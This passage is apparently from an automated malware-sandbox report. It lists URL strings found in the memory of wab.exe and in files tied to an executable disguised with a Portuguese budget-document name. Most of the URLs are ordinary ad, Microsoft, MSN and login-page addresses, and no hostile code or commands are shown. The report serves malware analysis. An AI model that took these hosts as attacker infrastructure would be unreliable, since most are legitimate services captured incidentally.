              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checks
              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.php
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://csp.withgoogle.com/csp/active-view-scs-read-write-acl
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://csp.withgoogle.com/csp/ads-programmable
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://csp.withgoogle.com/csp/botguard-scs
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://csp.withgoogle.com/csp/recaptcha/1
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-acl
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/ads-programmable
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/adspam-signals-scs
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/botguard-scs
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/recaptcha
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://cvision.media.net/new/300x300/2/45/221/3/7d5dc6a9-5325-442d-926e-f2c668b8e65e.jpg?v=9
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://cvision.media.net/new/300x300/2/75/165/127/fefc2984-60ee-407b-a704-0db527f30f53.jpg?v=9
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://cxcs.microsoft.net/api/gs/en-US/xmlv2/storyset?platform=desktop&release=20h2&schema=3.0&sku=
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://cxcs.microsoft.net/api/gs/en-US/xmlv2/tip-contentset?platform=desktop&release=20h2&schema=3.
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&plat
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/5c08e5e7-4cfd-4901-acbc-79925276672c/33c540c16
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b7
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/fb5aa6fc-fb0f-43c0-9aba-9bf4642cdd05/9a3b4a8d1
              Source: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Emphasising.exe.7.drString found in binary or memory: https://d.symcb.com/cps0%
              Source: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Emphasising.exe.7.drString found in binary or memory: https://d.symcb.com/rpa0
              Source: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Emphasising.exe.7.drString found in binary or memory: https://d.symcb.com/rpa0.
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eb2.3lif
              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eb2.3lift.com/sync
              Source: wab.exe, 0000000A.00000003.26363979719.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26359354278.00000000050A1000.00000004.00000020.00020000.00000000.sdmp, bhv1B7E.tmp.10.drString found in binary or memory: https://eb2.3lift.com/sync?
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-FRAr4b&Fr
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://evoke-windowsservices-tas.msedge.net/ab
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get.a
              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get3.adobe
              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get3.adobe.co
              Source: wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagea
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
              Source: wab.exe, 0000000A.00000003.26361732964.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26363979719.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361278373.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361499437.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26371488160.00000000030BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26362370177.00000000030CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361893694.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361424228.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361574298.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26371527059.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26362409031.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26362312132.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26362470528.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361654540.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361811934.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26362652368.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26362593824.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26362533542.00000000050A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211https://googleads.g.doubleclick.net/page
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/si
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://ib.3lift.com/sync.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://ib.adnxs.com/
              Source: wab.exe, 0000000A.00000003.26363979719.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, bhv1B7E.tmp.10.drString found in binary or memory: https://ib.adnxs.com/async_usersync_file
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4GhRT?ver=5f90
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4GhRY?ver=52e8
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4IMai
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4IQAK
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OALs
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OAdg?ver=1c49
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OFrw?ver=d941
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OFrz?ver=8427
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OI51?ver=0686
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ONWz
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWB7v5
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWFNIa
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWFNIj
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWG0VH
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWLcTb?ver=b557
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWLuYO
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKp8YX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAMqFmF?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AANf6qa.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AANf6qa?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODMk8?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODQmd?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODept?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOEFck?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=82
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOEQ0I?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOF4WR?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOF4Xx?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFBrV?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFC5q?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFCgW?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFCgW?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFE0J?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=70
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFENj?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFJFJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFLk7?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=43
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFWV8?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFhty?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFsUC?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFu51?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFy7B?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFyKG?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=60
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOG3Y7?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOG3Y7?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOG88s?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGPXq?h=194&w=300&m=6&q=60&u=t&o=t&l=f
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGQtJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGV90?h=194&w=300&m=6&q=60&u=t&o=t&l=f&x=5
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGapF?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGlbE?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGmTG?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGyYN?h=194&w=300&m=6&q=60&u=t&o=t&l=f
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOH2Ml?h=194&w=300&m=6&q=60&u=t&o=t&l=f
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOH6xB?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB10MkbM.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB10MkbM?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB14hq0P?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aXBV1?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1cEP3G?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1cG73h?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1ftEY0?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1gEFcn?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1kc8s?m=6&o=true&u=true&n=true&w=30&h=30
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7gRE?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hg4?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_368%2Cw_622%2Cc_fill%2Cg_faces:au
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
              Source: wab.exe, 0000000A.00000002.26373053097.00000000006F3000.00000004.00000010.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26371183036.00000000030C7000.00000004.00000020.00020000.00000000.sdmp, bhv1B7E.tmp.10.drString found in binary or memory: https://login.live.com/
              Source: wab.exe, 0000000A.00000003.26371183036.00000000030C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
              Source: wab.exe, 0000000A.00000002.26373053097.00000000006F3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/TIorq
              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsign
              Source: wab.exe, 0000000A.00000003.26363979719.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361278373.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361499437.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26371488160.00000000030BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361893694.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26371718325.00000000030BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361424228.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26359354278.00000000050A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361059681.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361574298.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26360989932.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26362409031.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26371901995.00000000030BF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26360917779.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26362312132.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26371827570.00000000030BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26362470528.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26360801253.00000000030CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361654540.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361811934.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26360732775.00000000050A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306842&rver=7.0.6730.0&wp=l
              Source: wab.exe, 0000000A.00000003.26362370177.00000000030CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26360801253.00000000030CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srfhttps://www.google.com/pagead/drt/uihttps://www.google.com/recaptcha
              Source: wab.exe, 0000000A.00000003.26359415561.00000000030D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srfwa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306842&rver=7.0.6730.0&wp=lb
              Source: wab.exe, 0000000A.00000003.26371183036.00000000030C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
              Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_hj8oSp9QdNfpZ07Gv-Ue0w2.css
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_qWV3sGhBzcGORhNLatPttg2.css
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedFinishStrings.en_BYvHTGVEjHmqRinYKC8bUQ2.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_fBfIO6PUjtiIRe-Q1r1v
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/WinJS_vcvx4TydCFioSeM4NLxTDw2.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.sv
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/marching_ants_white_166de53471265253ab3a456def
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90b
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/Win10HostFinish_PCore_3l9yQcHwDX6JY4dnECC1pg2.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/Win10HostLogin_PCore_rfy0-A_Y4TdpeysEFWwI1w2.js
